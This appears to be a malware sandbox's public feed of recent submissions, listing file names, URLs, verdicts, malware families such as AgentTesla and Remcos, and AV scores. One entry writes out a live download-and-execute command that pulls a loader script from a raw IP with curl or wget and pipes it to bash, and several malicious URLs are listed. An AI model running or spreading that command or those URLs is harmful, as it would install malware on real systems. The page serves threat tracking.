top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 47%
RFQ-HL51L05.exe
2024-04-24 08:06:07 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 45%
ABT-57809267-57236090890_____________________________________.exe
2024-04-24 08:05:07 +02:00
Info
Class
Clean
https://www.dropbox.com/l/scl/AAD6lEoqyZho87aww62F94Z841EifJcMLdA
2024-04-24 07:59:44 +02:00
Info
Clean
http://r20.rs6.net
2024-04-24 07:58:53 +02:00
Info
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 37%
yMHzNMo3xY.exe
2024-04-24 07:46:08 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
iwjvkEAIQa.rtf
2024-04-24 07:46:07 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
Remcos, DBatLoader
AV: 83%
OKhCyJ619J.rtf
2024-04-24 07:41:05 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
Babuk, Djvu, Vidar
AV: 74%
8jvTeVxooN.exe
2024-04-24 07:36:09 +02:00
Info
Class
Malicious
https://tibusiness.cl/css/causarol.rar
2024-04-24 07:34:38 +02:00
Info
no
Graph
Clean
https://r20.rs6.net/tn.jsp?f=0010gdwZK1zsOsjQXb-NAukJySfgXZyz_K3wcrtWdl2c9a0M2KwjR32yV-GeMGFctnLGHo0GtQqLsZebrpcjBBULA9LMqt3w49x9wkoDyiMBjklNW7pZwYa6OeeIr-PNeI4bgnrTAwRul3N-k6n9hiG6bmsBpkGnWt8Gw_FE34bso9t1M0xU8FlqrRDD68kdxoheDaQHY3vX0pawfZuw1D9OWVNFz9h-FGlYBaAJHtPvL2dUahcqWyjoAFYZbQzE8Ju&c=CDP-xJS150Z3ymCYoLtVfB94X14h3tr41f-WpvECDOmVDOiSMB8rSA==&ch=7fTjmLIMiDfz6AP3b7f4xde6-aYiS2qARZHxH1qoKYKTXexZGWNlng==
2024-04-24 07:30:51 +02:00
Info
Malicious
http://damarltda.cl/certificado.php
2024-04-24 07:24:48 +02:00
No classification & info
no
Graph
Clean
aMail_Ver1.exe
2024-04-24 07:23:38 +02:00
Info
Suspicious
aMail_Ver1.exe
2024-04-24 07:21:58 +02:00
Info
Malicious
  • Yara
  • Snort
FormBook, PureLog Stealer
AV: 35%
shipping document.exe
2024-04-24 07:13:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
powershell.ps1
2024-04-24 07:00:13 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
Remcos
AV: 87%
1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe
2024-04-24 06:57:13 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
Remcos, DBatLoader
AV: 83%
fu56fbrtn8.exe
2024-04-24 06:57:13 +02:00
Info
Class
Malicious
no Icon
echo linux&(curl http://92.60.39.76:9991/ldr.sh||wget -q -O- http://92.60.39.76:9991/ldr.sh||cc http://92.60.39.76:9991/ldr.sh||ww -q -O- http://92.60.39.76:9991/ldr.sh)|bash
2024-04-24 06:51:27 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla, PureLog Stealer, RedLine
AV: 47%
FİYAT TEKLİF.exe
2024-04-24 06:48:21 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla, PureLog Stealer, RedLine
AV: 53%
62402781, Fiyat Teklif Talebi.pdf.exe
2024-04-24 06:48:21 +02:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column